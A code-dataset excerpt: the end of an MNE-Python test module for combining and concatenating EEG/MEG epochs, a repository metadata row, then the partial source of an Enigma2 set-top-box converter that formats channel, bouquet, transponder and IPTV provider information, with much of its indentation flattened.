def make_epochs(picks, proj):
return Epochs(raw, events, event_id, tmin, tmax, preload=True,
proj=proj, picks=picks)
picks = pick_types(raw.info, meg=True, eeg=True, exclude='bads')
picks_meg = pick_types(raw.info, meg=True, eeg=False, exclude='bads')
picks_eeg = pick_types(raw.info, meg=False, eeg=True, exclude='bads')
for proj in (False, True):
epochs = make_epochs(picks=picks, proj=proj)
epochs_meg = make_epochs(picks=picks_meg, proj=proj)
epochs_eeg = make_epochs(picks=picks_eeg, proj=proj)
epochs.info._check_consistency()
epochs_meg.info._check_consistency()
epochs_eeg.info._check_consistency()
epochs2 = add_channels_epochs([epochs_meg, epochs_eeg])
assert_equal(len(epochs.info['projs']), len(epochs2.info['projs']))
assert_equal(len(epochs.info.keys()), len(epochs_meg.info.keys()))
assert_equal(len(epochs.info.keys()), len(epochs_eeg.info.keys()))
assert_equal(len(epochs.info.keys()), len(epochs2.info.keys()))
data1 = epochs.get_data()
data2 = epochs2.get_data()
data3 = np.concatenate([e.get_data() for e in
[epochs_meg, epochs_eeg]], axis=1)
assert_array_equal(data1.shape, data2.shape)
assert_allclose(data1, data3, atol=1e-25)
assert_allclose(data1, data2, atol=1e-25)
epochs_meg2 = epochs_meg.copy()
epochs_meg2.info['meas_date'] += 10
add_channels_epochs([epochs_meg2, epochs_eeg])
epochs_meg2 = epochs_meg.copy()
epochs2 = add_channels_epochs([epochs_meg, epochs_eeg])
epochs_meg2 = epochs_meg.copy()
epochs_meg2.events[3, 2] -= 1
assert_raises(ValueError, add_channels_epochs, [epochs_meg2, epochs_eeg])
assert_raises(ValueError, add_channels_epochs,
[epochs_meg, epochs_eeg[:2]])
epochs_meg.info['chs'].pop(0)
epochs_meg.info._update_redundant()
assert_raises(RuntimeError, add_channels_epochs, [epochs_meg, epochs_eeg])
epochs_meg2 = epochs_meg.copy()
epochs_meg2.info['sfreq'] = None
assert_raises(RuntimeError, add_channels_epochs, [epochs_meg2, epochs_eeg])
epochs_meg2 = epochs_meg.copy()
epochs_meg2.info['sfreq'] += 10
assert_raises(RuntimeError, add_channels_epochs, [epochs_meg2, epochs_eeg])
epochs_meg2 = epochs_meg.copy()
epochs_meg2.info['chs'][1]['ch_name'] = epochs_meg2.info['ch_names'][0]
epochs_meg2.info._update_redundant()
assert_raises(RuntimeError, add_channels_epochs, [epochs_meg2, epochs_eeg])
epochs_meg2 = epochs_meg.copy()
epochs_meg2.info['dev_head_t']['to'] += 1
assert_raises(ValueError, add_channels_epochs, [epochs_meg2, epochs_eeg])
epochs_meg2 = epochs_meg.copy()
epochs_meg2.info['dev_head_t']['to'] += 1
assert_raises(ValueError, add_channels_epochs, [epochs_meg2, epochs_eeg])
epochs_meg2 = epochs_meg.copy()
epochs_meg2.info['expimenter'] = 'foo'
assert_raises(RuntimeError, add_channels_epochs, [epochs_meg2, epochs_eeg])
epochs_meg2 = epochs_meg.copy()
epochs_meg2.preload = False
assert_raises(ValueError, add_channels_epochs, [epochs_meg2, epochs_eeg])
epochs_meg2 = epochs_meg.copy()
epochs_meg2.times += 0.4
assert_raises(NotImplementedError, add_channels_epochs,
[epochs_meg2, epochs_eeg])
epochs_meg2 = epochs_meg.copy()
epochs_meg2.times += 0.5
assert_raises(NotImplementedError, add_channels_epochs,
[epochs_meg2, epochs_eeg])
epochs_meg2 = epochs_meg.copy()
epochs_meg2.baseline = None
assert_raises(NotImplementedError, add_channels_epochs,
[epochs_meg2, epochs_eeg])
epochs_meg2 = epochs_meg.copy()
epochs_meg2.event_id['b'] = 2
assert_raises(NotImplementedError, add_channels_epochs,
[epochs_meg2, epochs_eeg])
def test_array_epochs():
"""Test creating epochs from array."""
import matplotlib.pyplot as plt
tempdir = _TempDir()
# creating
data = rng.random_sample((10, 20, 300))
sfreq = 1e3
ch_names = ['EEG %03d' % (i + 1) for i in range(20)]
types = ['eeg'] * 20
info = create_info(ch_names, sfreq, types)
events = np.c_[np.arange(1, 600, 60),
np.zeros(10, int),
[1, 2] * 5]
event_id = {'a': 1, 'b': 2}
epochs = EpochsArray(data, info, events, tmin, event_id)
assert_true(str(epochs).startswith('<EpochsArray'))
# From GH#1963
assert_raises(ValueError, EpochsArray, data[:-1], info, events, tmin,
event_id)
assert_raises(ValueError, EpochsArray, data, info, events, tmin,
dict(a=1))
# saving
temp_fname = op.join(tempdir, 'test-epo.fif')
epochs.save(temp_fname)
epochs2 = read_epochs(temp_fname)
data2 = epochs2.get_data()
assert_allclose(data, data2)
assert_allclose(epochs.times, epochs2.times)
assert_equal(epochs.event_id, epochs2.event_id)
assert_array_equal(epochs.events, epochs2.events)
# plotting
epochs[0].plot()
plt.close('all')
# indexing
assert_array_equal(np.unique(epochs['a'].events[:, 2]), np.array([1]))
assert_equal(len(epochs[:2]), 2)
data[0, 5, 150] = 3000
data[1, :, :] = 0
data[2, 5, 210] = 3000
data[3, 5, 260] = 0
epochs = EpochsArray(data, info, events=events, event_id=event_id,
tmin=0, reject=dict(eeg=1000), flat=dict(eeg=1e-1),
reject_tmin=0.1, reject_tmax=0.2)
assert_equal(len(epochs), len(events) - 2)
assert_equal(epochs.drop_log[0], ['EEG 006'])
assert_equal(len(epochs.drop_log), 10)
assert_equal(len(epochs.events), len(epochs.selection))
# baseline
data = np.ones((10, 20, 300))
epochs = EpochsArray(data, info, events, event_id=event_id, tmin=-.2,
baseline=(None, 0))
ep_data = epochs.get_data()
assert_array_equal(ep_data, np.zeros_like(ep_data))
# one time point
epochs = EpochsArray(data[:, :, :1], info, events=events,
event_id=event_id, tmin=0.)
assert_allclose(epochs.times, [0.])
assert_allclose(epochs.get_data(), data[:, :, :1])
epochs.save(temp_fname)
epochs_read = read_epochs(temp_fname)
assert_allclose(epochs_read.times, [0.])
assert_allclose(epochs_read.get_data(), data[:, :, :1])
# event as integer (#2435)
mask = (events[:, 2] == 1)
data_1 = data[mask]
events_1 = events[mask]
epochs = EpochsArray(data_1, info, events=events_1, event_id=1, tmin=-0.2)
# default events
epochs = EpochsArray(data_1, info)
assert_array_equal(epochs.events[:, 0], np.arange(len(data_1)))
assert_array_equal(epochs.events[:, 1], np.zeros(len(data_1), int))
assert_array_equal(epochs.events[:, 2], np.ones(len(data_1), int))
def test_concatenate_epochs():
"""Test concatenate epochs."""
raw, events, picks = _get_data()
epochs = Epochs(raw=raw, events=events, event_id=event_id, tmin=tmin,
tmax=tmax, picks=picks)
epochs2 = epochs.copy()
epochs_list = [epochs, epochs2]
epochs_conc = concatenate_epochs(epochs_list)
assert_array_equal(
epochs_conc.events[:, 0], np.unique(epochs_conc.events[:, 0]))
expected_shape = list(epochs.get_data().shape)
expected_shape[0] *= 2
expected_shape = tuple(expected_shape)
assert_equal(epochs_conc.get_data().shape, expected_shape)
assert_equal(epochs_conc.drop_log, epochs.drop_log * 2)
epochs2 = epochs.copy()
epochs2._data = epochs2.get_data()
epochs2.preload = True
assert_raises(
ValueError, concatenate_epochs,
[epochs, epochs2.copy().drop_channels(epochs2.ch_names[:1])])
epochs2.times = np.delete(epochs2.times, 1)
assert_raises(
ValueError,
concatenate_epochs, [epochs, epochs2])
assert_equal(epochs_conc._raw, None)
# check if baseline is same for all epochs
epochs2.baseline = (-0.1, None)
assert_raises(ValueError, concatenate_epochs, [epochs, epochs2])
# check if dev_head_t is same
epochs2 = epochs.copy()
concatenate_epochs([epochs, epochs2]) # should work
epochs2.info['dev_head_t']['trans'][:3, 3] += 0.0001
assert_raises(ValueError, concatenate_epochs, [epochs, epochs2])
assert_raises(TypeError, concatenate_epochs, 'foo')
assert_raises(TypeError, concatenate_epochs, [epochs, 'foo'])
epochs2.info['dev_head_t'] = None
assert_raises(ValueError, concatenate_epochs, [epochs, epochs2])
epochs.info['dev_head_t'] = None
concatenate_epochs([epochs, epochs2]) # should work
# check that different event_id does not work:
epochs1 = epochs.copy()
epochs2 = epochs.copy()
epochs1.event_id = dict(a=1)
epochs2.event_id = dict(a=2)
assert_raises(ValueError, concatenate_epochs, [epochs1, epochs2])
def test_add_channels():
"""Test epoch splitting / re-appending channel types."""
raw, events, picks = _get_data()
epoch_nopre = Epochs(
raw=raw, events=events, event_id=event_id, tmin=tmin, tmax=tmax,
picks=picks)
epoch = Epochs(
raw=raw, events=events, event_id=event_id, tmin=tmin, tmax=tmax,
picks=picks, preload=True)
epoch_eeg = epoch.copy().pick_types(meg=False, eeg=True)
epoch_meg = epoch.copy().pick_types(meg=True)
epoch_stim = epoch.copy().pick_types(meg=False, stim=True)
epoch_eeg_meg = epoch.copy().pick_types(meg=True, eeg=True)
epoch_new = epoch_meg.copy().add_channels([epoch_eeg, epoch_stim])
assert_true(all(ch in epoch_new.ch_names
for ch in epoch_stim.ch_names + epoch_meg.ch_names))
epoch_new = epoch_meg.copy().add_channels([epoch_eeg])
assert_true(ch in epoch_new.ch_names for ch in epoch.ch_names)
assert_array_equal(epoch_new._data, epoch_eeg_meg._data)
assert_true(all(ch not in epoch_new.ch_names
for ch in epoch_stim.ch_names))
# Now test errors
epoch_badsf = epoch_eeg.copy()
epoch_badsf.info['sfreq'] = 3.1415927
epoch_eeg = epoch_eeg.crop(-.1, .1)
assert_raises(AssertionError, epoch_meg.add_channels, [epoch_nopre])
assert_raises(RuntimeError, epoch_meg.add_channels, [epoch_badsf])
assert_raises(AssertionError, epoch_meg.add_channels, [epoch_eeg])
assert_raises(ValueError, epoch_meg.add_channels, [epoch_meg])
assert_raises(AssertionError, epoch_meg.add_channels, epoch_badsf)
def test_seeg_ecog():
"""Test the compatibility of the Epoch object with SEEG and ECoG data."""
n_epochs, n_channels, n_times, sfreq = 5, 10, 20, 1000.
data = np.ones((n_epochs, n_channels, n_times))
events = np.array([np.arange(n_epochs), [0] * n_epochs, [1] * n_epochs]).T
pick_dict = dict(meg=False, exclude=[])
for key in ('seeg', 'ecog'):
info = create_info(n_channels, sfreq, key)
epochs = EpochsArray(data, info, events)
pick_dict.update({key: True})
picks = pick_types(epochs.info, **pick_dict)
del pick_dict[key]
assert_equal(len(picks), n_channels)
def test_default_values():
"""Test default event_id, tmax tmin values are working correctly"""
raw, events = _get_data()[:2]
epoch_1 = Epochs(raw, events[:1], preload=True)
epoch_2 = Epochs(raw, events[:1], tmin=-0.2, tmax=0.5, preload=True)
assert_equal(hash(epoch_1), hash(epoch_2))
run_tests_if_main()
| bsd-3-clause | 8,410,499,245,579,183,000 | 42.322122 | 79 | 0.604802 | false |
MOA-2011/enigma2.pli4.0 | lib/python/Components/Converter/ServiceName2.py | 1 | 23033 | # -*- coding: utf-8 -*-
#
# Extended ServiceName Converter for Enigma2 Dreamboxes (ServiceName2.py)
# Coded by vlamo (c) 2011
#
# Version: 0.4 (03.06.2011 18:40)
# Version: 0.5 (08.09.2012) add Alternative numbering mode support - Dmitry73 & 2boom
# Version: 0.6 (19.10.2012) add stream mapping
# Version: 0.7 (19.09.2013) add iptv info - nikolasi & 2boom
# Version: 0.8 (29.10.2013) add correct output channelnumner - Dmitry73
# Version: 0.9 (18.11.2013) code fix and optimization - Taapat & nikolasi
# Version: 1.0 (04.12.2013) code fix and optimization - Dmitry73
# Version: 1.1 (06-17.12.2013) small cosmetic fix - 2boom
# Version: 1.2 (25.12.2013) small iptv fix - MegAndretH
# Version: 1.3 (27.01.2014) small iptv fix - 2boom
# Version: 1.4 (30.06.2014) fix iptv reference - 2boom
# Version: 1.5 (04.07.2014) fix iptv reference cosmetic - 2boom
# Support: http://dream.altmaster.net/ & http://gisclub.tv
#
from Components.Converter.Converter import Converter
from enigma import iServiceInformation, iPlayableService, iPlayableServicePtr, eServiceReference, eServiceCenter, eTimer, getBestPlayableServiceReference
from Components.Element import cached
from Components.config import config
import NavigationInstance
try:
from Components.Renderer.ChannelNumber import ChannelNumberClasses
correctChannelNumber = True
except:
correctChannelNumber = False
class ServiceName2(Converter, object):
NAME = 0
NUMBER = 1
BOUQUET = 2
PROVIDER = 3
REFERENCE = 4
ORBPOS = 5
TPRDATA = 6
SATELLITE = 7
ALLREF = 8
FORMAT = 9
def __init__(self, type):
Converter.__init__(self, type)
if type == "Name" or not len(str(type)):
self.type = self.NAME
elif type == "Number":
self.type = self.NUMBER
elif type == "Bouquet":
self.type = self.BOUQUET
elif type == "Provider":
self.type = self.PROVIDER
elif type == "Reference":
self.type = self.REFERENCE
elif type == "OrbitalPos":
self.type = self.ORBPOS
elif type == "TpansponderInfo":
self.type = self.TPRDATA
elif type == "Satellite":
self.type = self.SATELLITE
elif type == "AllRef":
self.type = self.ALLREF
else:
self.type = self.FORMAT
self.sfmt = type[:]
try:
if (self.type == 1 or (self.type == 9 and '%n' in self.sfmt)) and correctChannelNumber:
ChannelNumberClasses.append(self.forceChanged)
except:
pass
self.refstr = self.isStream = self.ref = self.info = self.what = self.tpdata = None
self.Timer = eTimer()
self.Timer.callback.append(self.neededChange)
self.IPTVcontrol = self.isAdditionalService(type=0)
self.AlternativeControl = self.isAdditionalService(type=1)
def isAdditionalService(self, type=0):
def searchService(serviceHandler, bouquet):
istype = False
servicelist = serviceHandler.list(bouquet)
if not servicelist is None:
while True:
s = servicelist.getNext()
if not s.valid(): break
if not (s.flags & (eServiceReference.isMarker|eServiceReference.isDirectory)):
if type:
if s.flags & eServiceReference.isGroup:
istype = True
return istype
else:
if "%3a//" in s.toString().lower():
istype = True
return istype
return istype
isService = False
serviceHandler = eServiceCenter.getInstance()
if not config.usage.multibouquet.value:
service_types_tv = '1:7:1:0:0:0:0:0:0:0:(type == 1) || (type == 17) || (type == 22) || (type == 25) || (type == 134) || (type == 195)'
rootstr = '%s FROM BOUQUET "userbouquet.favourites.tv" ORDER BY bouquet'%(service_types_tv)
else:
rootstr = '1:7:1:0:0:0:0:0:0:0:FROM BOUQUET "bouquets.tv" ORDER BY bouquet'
bouquet = eServiceReference(rootstr)
if not config.usage.multibouquet.value:
isService = searchService(serviceHandler, bouquet)
else:
bouquetlist = serviceHandler.list(bouquet)
if not bouquetlist is None:
while True:
bouquet = bouquetlist.getNext()
if not bouquet.valid(): break
if bouquet.flags & eServiceReference.isDirectory:
isService = searchService(serviceHandler, bouquet)
if isService: break
return isService
def getServiceNumber(self, ref):
def searchHelper(serviceHandler, num, bouquet):
servicelist = serviceHandler.list(bouquet)
if not servicelist is None:
while True:
s = servicelist.getNext()
if not s.valid(): break
if not (s.flags & (eServiceReference.isMarker|eServiceReference.isDirectory)):
num += 1
if s == ref: return s, num
return None, num
if isinstance(ref, eServiceReference):
isRadioService = ref.getData(0) in (2,10)
lastpath = isRadioService and config.radio.lastroot.value or config.tv.lastroot.value
if 'FROM BOUQUET' not in lastpath:
if 'FROM PROVIDERS' in lastpath:
return 'P', 'Provider'
if 'FROM SATELLITES' in lastpath:
return 'S', 'Satellites'
if ') ORDER BY name' in lastpath:
return 'A', 'All Services'
return 0, 'N/A'
try:
acount = config.plugins.NumberZapExt.enable.value and config.plugins.NumberZapExt.acount.value or config.usage.alternative_number_mode.value
except:
acount = False
rootstr = ''
for x in lastpath.split(';'):
if x != '': rootstr = x
serviceHandler = eServiceCenter.getInstance()
if acount is True or not config.usage.multibouquet.value:
bouquet = eServiceReference(rootstr)
service, number = searchHelper(serviceHandler, 0, bouquet)
else:
if isRadioService:
bqrootstr = '1:7:2:0:0:0:0:0:0:0:FROM BOUQUET "bouquets.radio" ORDER BY bouquet'
else:
bqrootstr = '1:7:1:0:0:0:0:0:0:0:FROM BOUQUET "bouquets.tv" ORDER BY bouquet'
number = 0
cur = eServiceReference(rootstr)
bouquet = eServiceReference(bqrootstr)
bouquetlist = serviceHandler.list(bouquet)
if not bouquetlist is None:
while True:
bouquet = bouquetlist.getNext()
if not bouquet.valid(): break
if bouquet.flags & eServiceReference.isDirectory:
service, number = searchHelper(serviceHandler, number, bouquet)
if not service is None and cur == bouquet: break
if not service is None:
info = serviceHandler.info(bouquet)
name = info and info.getName(bouquet) or ''
return number, name
return 0, ''
def getProviderName(self, ref):
if isinstance(ref, eServiceReference):
from Screens.ChannelSelection import service_types_radio, service_types_tv
typestr = ref.getData(0) in (2,10) and service_types_radio or service_types_tv
pos = typestr.rfind(':')
rootstr = '%s (channelID == %08x%04x%04x) && %s FROM PROVIDERS ORDER BY name' %(typestr[:pos+1],ref.getUnsignedData(4),ref.getUnsignedData(2),ref.getUnsignedData(3),typestr[pos+1:])
provider_root = eServiceReference(rootstr)
serviceHandler = eServiceCenter.getInstance()
providerlist = serviceHandler.list(provider_root)
if not providerlist is None:
while True:
provider = providerlist.getNext()
if not provider.valid(): break
if provider.flags & eServiceReference.isDirectory:
servicelist = serviceHandler.list(provider)
if not servicelist is None:
while True:
service = servicelist.getNext()
if not service.valid(): break
if service == ref:
info = serviceHandler.info(provider)
return info and info.getName(provider) or "Unknown"
return ""
def getTransponderInfo(self, info, ref, fmt):
result = ""
if self.tpdata is None:
if ref:
self.tpdata = ref and info.getInfoObject(ref, iServiceInformation.sTransponderData)
else:
self.tpdata = info.getInfoObject(iServiceInformation.sTransponderData)
if not isinstance(self.tpdata, dict):
self.tpdata = None
return result
if self.isStream:
type = 'IP-TV'
else:
type = self.tpdata.get('tuner_type', '')
if not fmt or fmt == 'T':
if type == 'DVB-C':
fmt = ["t ","F ","Y ","i ","f ","M"] #(type frequency symbol_rate inversion fec modulation)
elif type == 'DVB-T':
if ref:
fmt = ["O ","F ","h ","m ","g ","c"] #(orbital_position code_rate_hp transmission_mode guard_interval constellation)
else:
fmt = ["t ","F ","h ","m ","g ","c"] #(type frequency code_rate_hp transmission_mode guard_interval constellation)
elif type == 'IP-TV':
return _("Streaming")
else:
fmt = ["O ","F","p ","Y ","f"] #(orbital_position frequency polarization symbol_rate fec)
for line in fmt:
f = line[:1]
if f == 't': # %t - tuner_type (dvb-s/s2/c/t)
if type == 'DVB-S':
result += _("Satellite")
elif type == 'DVB-C':
result += _("Cable")
elif type == 'DVB-T':
result += _("Terrestrial")
elif type == 'IP-TV':
result += _('Stream-tv')
else:
result += 'N/A'
elif f == 's': # %s - system (dvb-s/s2/c/t)
if type == 'DVB-S':
x = self.tpdata.get('system', 0)
result += x in range(2) and {0:'DVB-S',1:'DVB-S2'}[x] or ''
else:
result += type
elif f == 'F': # %F - frequency (dvb-s/s2/c/t) in KHz
if type in ('DVB-S','DVB-C','DVB-T'):
result += '%d'%(self.tpdata.get('frequency', 0) / 1000)
elif f == 'f': # %f - fec_inner (dvb-s/s2/c/t)
if type in ('DVB-S','DVB-C'):
x = self.tpdata.get('fec_inner', 15)
result += x in range(10)+[15] and {0:'Auto',1:'1/2',2:'2/3',3:'3/4',4:'5/6',5:'7/8',6:'8/9',7:'3/5',8:'4/5',9:'9/10',15:'None'}[x] or ''
elif type == 'DVB-T':
x = self.tpdata.get('code_rate_lp', 5)
result += x in range(6) and {0:'1/2',1:'2/3',2:'3/4',3:'5/6',4:'7/8',5:'Auto'}[x] or ''
elif f == 'i': # %i - inversion (dvb-s/s2/c/t)
if type in ('DVB-S','DVB-C','DVB-T'):
x = self.tpdata.get('inversion', 2)
result += x in range(3) and {0:'On',1:'Off',2:'Auto'}[x] or ''
elif f == 'O': # %O - orbital_position (dvb-s/s2)
if type == 'DVB-S':
x = self.tpdata.get('orbital_position', 0)
result += x > 1800 and "%d.%d°W"%((3600-x)/10, (3600-x)%10) or "%d.%d°E"%(x/10, x%10)
elif type == 'DVB-T':
result += 'DVB-T'
elif type == 'DVB-C':
result += 'DVB-C'
				elif type == 'IP-TV':
result += 'Stream'
elif f == 'M': # %M - modulation (dvb-s/s2/c)
x = self.tpdata.get('modulation', 1)
if type == 'DVB-S':
result += x in range(4) and {0:'Auto',1:'QPSK',2:'8PSK',3:'QAM16'}[x] or ''
elif type == 'DVB-C':
result += x in range(6) and {0:'Auto',1:'QAM16',2:'QAM32',3:'QAM64',4:'QAM128',5:'QAM256'}[x] or ''
elif f == 'p': # %p - polarization (dvb-s/s2)
if type == 'DVB-S':
x = self.tpdata.get('polarization', 0)
result += x in range(4) and {0:'H',1:'V',2:'L',3:'R'}[x] or '?'
elif f == 'Y': # %Y - symbol_rate (dvb-s/s2/c)
if type in ('DVB-S','DVB-C'):
result += '%d'%(self.tpdata.get('symbol_rate', 0) / 1000)
elif f == 'r': # %r - rolloff (dvb-s2)
if not self.isStream:
x = self.tpdata.get('rolloff')
if not x is None:
result += x in range(3) and {0:'0.35',1:'0.25',2:'0.20'}[x] or ''
elif f == 'o': # %o - pilot (dvb-s2)
if not self.isStream:
x = self.tpdata.get('pilot')
if not x is None:
result += x in range(3) and {0:'Off',1:'On',2:'Auto'}[x] or ''
elif f == 'c': # %c - constellation (dvb-t)
if type == 'DVB-T':
x = self.tpdata.get('constellation', 3)
result += x in range(4) and {0:'QPSK',1:'QAM16',2:'QAM64',3:'Auto'}[x] or ''
elif f == 'l': # %l - code_rate_lp (dvb-t)
if type == 'DVB-T':
x = self.tpdata.get('code_rate_lp', 5)
result += x in range(6) and {0:'1/2',1:'2/3',2:'3/4',3:'5/6',4:'7/8',5:'Auto'}[x] or ''
elif f == 'h': # %h - code_rate_hp (dvb-t)
if type == 'DVB-T':
x = self.tpdata.get('code_rate_hp', 5)
result += x in range(6) and {0:'1/2',1:'2/3',2:'3/4',3:'5/6',4:'7/8',5:'Auto'}[x] or ''
elif f == 'm': # %m - transmission_mode (dvb-t)
if type == 'DVB-T':
x = self.tpdata.get('transmission_mode', 2)
result += x in range(3) and {0:'2k',1:'8k',2:'Auto'}[x] or ''
elif f == 'g': # %g - guard_interval (dvb-t)
if type == 'DVB-T':
x = self.tpdata.get('guard_interval', 4)
result += x in range(5) and {0:'1/32',1:'1/16',2:'1/8',3:'1/4',4:'Auto'}[x] or ''
elif f == 'b': # %b - bandwidth (dvb-t)
if type == 'DVB-T':
x = self.tpdata.get('bandwidth', 1)
result += x in range(4) and {0:'8 MHz',1:'7 MHz',2:'6 MHz',3:'Auto'}[x] or ''
elif f == 'e': # %e - hierarchy_information (dvb-t)
if type == 'DVB-T':
x = self.tpdata.get('hierarchy_information', 4)
result += x in range(5) and {0:'None',1:'1',2:'2',3:'4',4:'Auto'}[x] or ''
result += line[1:]
return result
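	# Illustrative example (added note; the transponder values below are assumptions,
	# not data from a real service): with the default DVB-S format ["O ","F","p ","Y ","f"],
	# a tpdata dict such as {'tuner_type': 'DVB-S', 'orbital_position': 130,
	# 'frequency': 11034000, 'polarization': 0, 'symbol_rate': 27500000, 'fec_inner': 3}
	# would render roughly as "13.0E 11034H 27500 3/4"
	# (orbital position, frequency, polarization, symbol rate, FEC).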
def getSatelliteName(self, ref):
if isinstance(ref, eServiceReference):
orbpos = ref.getUnsignedData(4) >> 16
if orbpos == 0xFFFF: #Cable
return _("Cable")
elif orbpos == 0xEEEE: #Terrestrial
return _("Terrestrial")
else: #Satellite
orbpos = ref.getData(4) >> 16
if orbpos < 0: orbpos += 3600
try:
from Components.NimManager import nimmanager
return str(nimmanager.getSatDescription(orbpos))
except:
dir = ref.flags & (eServiceReference.isDirectory|eServiceReference.isMarker)
if not dir:
refString = ref.toString().lower()
if refString.startswith("-1"):
return ''
elif refString.startswith("1:134:"):
return _("Alternative")
elif refString.startswith("4097:"):
return _("Internet")
else:
return orbpos > 1800 and "%d.%d°W"%((3600-orbpos)/10, (3600-orbpos)%10) or "%d.%d°E"%(orbpos/10, orbpos%10)
return ""
def getIPTVProvider(self, refstr):
if 'tvshka' in refstr:
return "SCHURA"
elif 'udp/239.0.1' in refstr:
return "Lanet"
elif '3a7777' in refstr:
return "IPTVNTV"
elif 'KartinaTV' in refstr:
return "KartinaTV"
elif 'Megaimpuls' in refstr:
return "MEGAIMPULSTV"
elif 'Newrus' in refstr:
return "NEWRUSTV"
elif 'Sovok' in refstr:
return "SOVOKTV"
elif 'Rodnoe' in refstr:
return "RODNOETV"
elif '238.1.1.89%3a1234' in refstr:
return "TRK UKRAINE"
elif '238.1.1.181%3a1234' in refstr:
return "VIASAT"
elif 'cdnet' in refstr:
return "NonameTV"
elif 'unicast' in refstr:
return "StarLink"
elif 'udp/239.255.2.' in refstr:
return "Planeta"
elif 'udp/233.7.70.' in refstr:
return "Rostelecom"
elif 'udp/239.1.1.' in refstr:
return "Real"
elif 'udp/238.0.' in refstr or 'udp/233.191.' in refstr:
return "Triolan"
elif '%3a8208' in refstr:
return "MovieStar"
elif 'udp/239.0.0.' in refstr:
return "Trinity"
elif '.cn.ru' in refstr or 'novotelecom' in refstr:
return "Novotelecom"
elif 'www.youtube.com' in refstr:
return "www.youtube.com"
elif '.torrent-tv.ru' in refstr:
return "torrent-tv.ru"
elif '//91.201.' in refstr:
return "www.livehd.tv"
elif 'web.tvbox.md' in refstr:
return "web.tvbox.md"
elif 'live-p12' in refstr:
return "PAC12"
elif '4097' in refstr:
return "StreamTV"
elif '%3a1234' in refstr:
return "IPTV1"
return ""
def getPlayingref(self, ref):
playingref = None
if NavigationInstance.instance:
playingref = NavigationInstance.instance.getCurrentlyPlayingServiceReference()
if not playingref:
playingref = eServiceReference()
return playingref
def resolveAlternate(self, ref):
nref = getBestPlayableServiceReference(ref, self.getPlayingref(ref))
if not nref:
nref = getBestPlayableServiceReference(ref, eServiceReference(), True)
return nref
def getReferenceType(self, refstr, ref):
if ref is None:
if NavigationInstance.instance:
playref = NavigationInstance.instance.getCurrentlyPlayingServiceReference()
if playref:
refstr = playref.toString() or ''
prefix = ''
if refstr.startswith("4097:"):
prefix += "GStreamer "
if '%3a//' in refstr:
sref = ' '.join(refstr.split(':')[10:])
refstr = prefix + sref
else:
sref = ':'.join(refstr.split(':')[:10])
refstr = prefix + sref
else:
if refstr != '':
prefix = ''
if refstr.startswith("1:7:"):
if 'FROM BOUQUET' in refstr:
prefix += "Bouquet "
elif '(provider == ' in refstr:
prefix += "Provider "
elif '(satellitePosition == ' in refstr:
prefix += "Satellit "
elif '(channelID == ' in refstr:
prefix += "Current tr "
elif refstr.startswith("1:134:"):
prefix += "Alter "
elif refstr.startswith("1:64:"):
prefix += "Marker "
elif refstr.startswith("4097:"):
prefix += "GStreamer "
if self.isStream:
if self.refstr:
if '%3a//' in self.refstr:
sref = ' '.join(self.refstr.split(':')[10:])
else:
sref = ':'.join(self.refstr.split(':')[:10])
else:
sref = ' '.join(refstr.split(':')[10:])
return prefix + sref
else:
if self.refstr:
sref = ':'.join(self.refstr.split(':')[:10])
else:
sref = ':'.join(refstr.split(':')[:10])
return prefix + sref
return refstr
@cached
def getText(self):
service = self.source.service
if isinstance(service, iPlayableServicePtr):
info = service and service.info()
ref = None
else: # reference
info = service and self.source.info
ref = service
if not info: return ""
if ref:
refstr = ref.toString()
else:
refstr = info.getInfoString(iServiceInformation.sServiceref)
if refstr is None:
refstr = ''
if self.AlternativeControl:
if ref and refstr.startswith("1:134:") and self.ref is None:
nref = self.resolveAlternate(ref)
if nref:
self.ref = nref
self.info = eServiceCenter.getInstance().info(self.ref)
self.refstr = self.ref.toString()
if not self.info: return ""
if self.IPTVcontrol:
if '%3a//' in refstr or (self.refstr and '%3a//' in self.refstr) or refstr.startswith("4097:"):
self.isStream = True
if self.type == self.NAME:
name = ref and (info.getName(ref) or 'N/A') or (info.getName() or 'N/A')
prefix = ''
if self.ref:
prefix = " (alter)"
name += prefix
return name.replace('\xc2\x86', '').replace('\xc2\x87', '')
elif self.type == self.NUMBER:
try:
service = self.source.serviceref
num = service and service.getChannelNum() or None
except:
num = None
if num:
return str(num)
else:
num, bouq = self.getServiceNumber(ref or eServiceReference(info.getInfoString(iServiceInformation.sServiceref)))
return num and str(num) or ''
elif self.type == self.BOUQUET:
num, bouq = self.getServiceNumber(ref or eServiceReference(info.getInfoString(iServiceInformation.sServiceref)))
return bouq
elif self.type == self.PROVIDER:
if self.isStream:
if self.refstr and ('%3a//' in self.refstr or '%3a//' in self.refstr):
return self.getIPTVProvider(self.refstr)
return self.getIPTVProvider(refstr)
else:
if self.ref:
return self.getProviderName(self.ref)
if ref:
return self.getProviderName(ref)
else:
return info.getInfoString(iServiceInformation.sProvider) or ''
elif self.type == self.REFERENCE:
if self.refstr:
return self.refstr
return refstr
elif self.type == self.ORBPOS:
if self.isStream:
return "Stream"
else:
if self.ref and self.info:
return self.getTransponderInfo(self.info, self.ref, 'O')
return self.getTransponderInfo(info, ref, 'O')
elif self.type == self.TPRDATA:
if self.isStream:
return _("Streaming")
else:
if self.ref and self.info:
return self.getTransponderInfo(self.info, self.ref, 'T')
return self.getTransponderInfo(info, ref, 'T')
elif self.type == self.SATELLITE:
if self.isStream:
return _("Internet")
else:
if self.ref:
return self.getSatelliteName(self.ref)
#test#
return self.getSatelliteName(ref or eServiceReference(info.getInfoString(iServiceInformation.sServiceref)))
elif self.type == self.ALLREF:
tmpref = self.getReferenceType(refstr, ref)
if 'Bouquet' in tmpref or 'Satellit' in tmpref or 'Provider' in tmpref:
return ' '
elif '%3a' in tmpref:
return ':'.join(refstr.split(':')[:10])
return tmpref
elif self.type == self.FORMAT:
num = bouq = ''
tmp = self.sfmt[:].split("%")
if tmp:
ret = tmp[0]
tmp.remove(ret)
else:
return ""
for line in tmp:
f = line[:1]
if f == 'N': # %N - Name
name = ref and (info.getName(ref) or 'N/A') or (info.getName() or 'N/A')
postfix = ''
if self.ref:
postfix = " (alter)"
name += postfix
ret += name.replace('\xc2\x86', '').replace('\xc2\x87', '')
elif f == 'n': # %n - Number
try:
service = self.source.serviceref
num = service and service.getChannelNum() or None
except:
num = None
if num:
ret += str(num)
else:
num, bouq = self.getServiceNumber(ref or eServiceReference(info.getInfoString(iServiceInformation.sServiceref)))
ret += num and str(num) or ''
elif f == 'B': # %B - Bouquet
num, bouq = self.getServiceNumber(ref or eServiceReference(info.getInfoString(iServiceInformation.sServiceref)))
ret += bouq
elif f == 'P': # %P - Provider
if self.isStream:
if self.refstr and '%3a//' in self.refstr:
